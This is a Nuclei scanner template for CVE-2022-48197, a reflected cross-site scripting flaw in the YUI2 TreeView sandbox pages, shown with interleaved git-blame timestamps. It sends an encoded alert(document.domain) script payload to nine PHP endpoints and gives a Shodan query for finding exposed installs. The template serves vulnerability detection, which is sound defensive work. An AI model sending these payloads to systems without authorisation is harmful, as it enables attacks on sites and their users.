nuclei-templates/http/cves/2022/CVE-2022-48197.yaml

57 lines
2.8 KiB
YAML
Raw Normal View History

2023-10-04 01:49:16 +00:00
id: CVE-2022-48197
2023-10-05 07:27:16 +00:00
2023-10-04 01:49:16 +00:00
info:
name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
author: ctflearner
severity: medium
2023-10-05 07:27:16 +00:00
description: |
2023-10-04 01:49:16 +00:00
Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.
reference:
- https://www.exploit-db.com/exploits/51198
- https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html
2023-10-05 07:27:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-48197
remediation: Upgrade to the latest version to mitigate this vulnerability.
2023-10-04 01:49:16 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-48197
cwe-id: CWE-79
cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*
metadata:
max-request: 9
2023-10-05 07:45:20 +00:00
shodan-query: html:"bower_components/yui2/"
verified: true
2023-10-05 07:45:20 +00:00
tags: yui2,cve,cve2022,xss,yahoo,treeview
2023-10-05 07:27:16 +00:00
2023-10-04 01:49:16 +00:00
http:
- method: GET
path:
2023-10-05 07:45:20 +00:00
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
2023-10-05 07:27:16 +00:00
stop-at-first-match: true
2023-10-04 01:49:16 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-10-05 07:45:20 +00:00
- "1'\"()&%<zzz><script>alert(document.domain)</script>"
- "widget.TreeView"
2023-10-04 01:49:16 +00:00
condition: and
2023-10-05 07:27:16 +00:00
2023-10-04 01:49:16 +00:00
- type: word
part: header
words:
- text/html
2023-10-05 07:27:16 +00:00
2023-10-04 01:49:16 +00:00
- type: status
status:
- 200